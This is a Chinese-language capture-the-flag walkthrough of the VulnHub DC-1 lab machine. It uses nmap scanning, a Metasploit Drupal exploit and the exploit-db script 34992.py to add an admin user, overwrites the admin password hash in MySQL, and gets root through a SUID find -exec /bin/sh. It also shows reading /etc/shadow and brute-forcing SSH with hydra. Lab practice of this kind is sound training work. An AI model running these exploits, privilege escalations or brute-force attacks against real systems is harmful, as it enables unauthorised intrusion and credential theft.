Vulnhub靶场——DC-1
记一次Vulnhub靶场练习记录
靶机DC-1下载地址:
官方地址
https://download.vulnhub.com/dc/DC-1.zip
该靶场共有5个flag,下面我们一个一个寻找
打开靶机,使用kali进行局域网地址扫描
方法一、
arp-scan -l
方法二、
查看本机IP
ip addr
nmap -sP 192.168.101.0/24
发现目标主机后检测其开放的端口
nmap -A -p- 192.168.101.11
发现开启了80端口,在浏览器查看页面信息
使用kali的Metasploit工具检查Drupal网站存在的漏洞
使用相对较新的漏洞成功率会高一点
顺利拿到shell,查看当前目录下的文件结构
发现flag1.txt,使用cat命令进行查看
得到下一步骤的提示,去查看配置文件
查找后发现CMS的配置文件是网站根目录下的sites/default下的setting.php文件
查看文件信息
在这里发现了flag2和数据库用户名和密码的信息
尝试登陆数据库
发现有python工具
发现靶机已安装python 2.7.3,通过pty.spawn()获得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
利用之前拿到的账号密码登陆MySQL
mysql -udbuser -pR0ck3t
成功登陆到MySQL数据库中,查看数据库名
发现users数据表,猜测存储的是用户信息
这里有两个方法获得admin权限
方法一、使用漏洞得到一个具有admin权限的新用户
查看版本信息
cat /var/www/includes/bootstrap.inc | grep VERSION
Drupal版本为7.24
查询攻击脚本信息
searchsploit drupal
可以添加的用户名为admin1,密码为admin1使用适合的攻击脚本进行攻击
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.101.11 -u admin1 -p admin1
查询数据库信息
方法二、更改admin的密码
加密脚本位置在网站根目录下的scripts下,查询网站根目录位置
切换到网站根目录,使用加密脚本生成加密密文
./scripts/password-hash.sh
进入MySQL更改admin密码
update users set pass="$S$D1mTsTyVgtvyORw3IOMad6WA5GlcWXJXFTNIzW670qs055u0/mY9" where uid=1;
查询数据信息
更改成功
在网页进行登陆,在Content中发现flag3
Flag3关键词有perms、find、-exec、shadow
使用find查询有特殊权限suid的命令
find / -perm -4000
find / -type f -perm -u=s 2>/dev/null
发现其中有find命令,使用find命令进行提权
开始尝试
touch aaa
find ./ -name aaa -exec "whoami" \;
find ./ -name aaa -exec "/bin/sh" \;
成功提权
之前在查看网站根目录时发现有一个flag4用户,所以在home目录下应该还有一个flag4目录
进行查看
查看root目录结构
成功拿到全部flag
.
.
.
.
.
.
此系统的flag4用户可以使用hydra工具爆破密码,下载John密码包
wget clone http://www.openwall.com/john/j/john-1.8.0.tar.gz
tar -xvf john-1.8.0.tar.gz
cd john-1.8.0/src
make linux-x86-64
查看/etc/shadow信息
使用如下命令进行暴力破解
hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.101.11 -f -vV -o hydraflag4.ssh
得到flag4的账号密码
login: flag4 password: orange
可以使用ssh进行登陆
如果直接进行了提权操作就不需要对flag4进行暴力破解了,可以直接看到flag4信息,而且flag4用户无法查看/root目录内的文件信息,所以还是直接提权方便一点
.
本文参考文档
https://blog.csdn.net/weixin_43583637/article/details/101542749
https://blog.csdn.net/weixin_41038469/article/details/88409725
Vulnhub靶场——DC-1的更多相关文章
- Vulnhub靶场DC-1 WP
前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- VulnHub靶场学习_HA: ARMOUR
HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...
- VulnHub靶场学习_HA: InfinityStones
HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...
- VulnHub靶场学习_HA: Avengers Arsenal
HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...
- VulnHub靶场学习_HA: Chanakya
HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...
- VulnHub靶场学习_HA: Pandavas
HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...
- VulnHub靶场学习_HA: Natraj
HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...
- VulnHub靶场学习_HA: Chakravyuh
HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...
随机推荐
- 基于 Source Generators 做个 AOP 静态编织小实验
0. 前言 上接:用 Roslyn 做个 JIT 的 AOP 作为第二篇,我们基于Source Generators做个AOP静态编织小实验. 内容安排如下: source generators 是什 ...
- django配置-mysql数据库相关配置
Django3版本之前的配置 1. Django默认配置的数据库是sqlite 2. 使用mysql数据库需要下载的包 pip3 install PyMySQL 3. Django配置PyMySQL ...
- 深度图解Redis Cluster原理
不想谈好吉他的撸铁狗,不是好的程序员,欢迎微信关注「SH的全栈笔记」 前言 上文我们聊了基于Sentinel的Redis高可用架构,了解了Redis基于读写分离的主从架构,同时也知道当Redis的ma ...
- Python 带你高效创作短视频,视频创作秀到飞起!!!
近两年,抖音.快手将短视频推到风口浪尖上,要生产出高质量的视频,离不开视频剪辑这一环节:在全民剪片浪潮中,大众使用最多的剪辑软件如:Pr.FCPX.剪印.Vue 等. 视频剪辑过程中,Python 一 ...
- Linux工具包
Linux的工具包 JDK 版本:14 百度网盘:链接: https://pan.baidu.com/s/1hWqGVmsElOCBufMuscPXzw 密码:st3y 安装步骤: 1.使用S ...
- Core3.0读取appsetting.json中的配置参数
前言 方法很多,下面的例子也是从百度上搜索到的,原文链接已经找不到了. 方法1 1.添加NovelSetting节点,写入相关的配置信息 2.创建类,字段与上面的配置一致 3.StartUp.cs中获 ...
- Office__自动保存和恢复
#1.前言 在您埋头辛苦编辑Excel.Word或PPT文档的时候,如果突然发生断电.系统崩溃.意外误操作,本文将以Excel2010为例详细阐述其中自动保存功能的工作机理和恢复文件的访问方法,Exc ...
- Excel 单元格快速填充技巧
1.普通的复制填充空白单元格 直接左键选中单元格右下边框向下拉,选择填充格式(复制填充) 2.普通的顺序填充空白单元格 直接左键选中单元格右下边框向下拉,选择填充格式(序列填充) 3.其他方式填充空白 ...
- hibernate连接数据库中文乱码
4.做完这两步还是不行,需要修改hibernate的配置文件hibernate.cfg.xml,在配置文件配置hibernate.connection.url属性.示例: <property n ...
- 记一次Apache的代码导致生产服务耗时增加
引言 二狗:二胖快醒醒,赶紧看看刚才报警邮件,你上次写的保存用户接口耗时(<二胖的参数校验坎坷之路>)大大上升,赶紧排查下原因. 二胖:好的,马上看,内心戏可十足(心里却在抱怨,大中午的搅 ...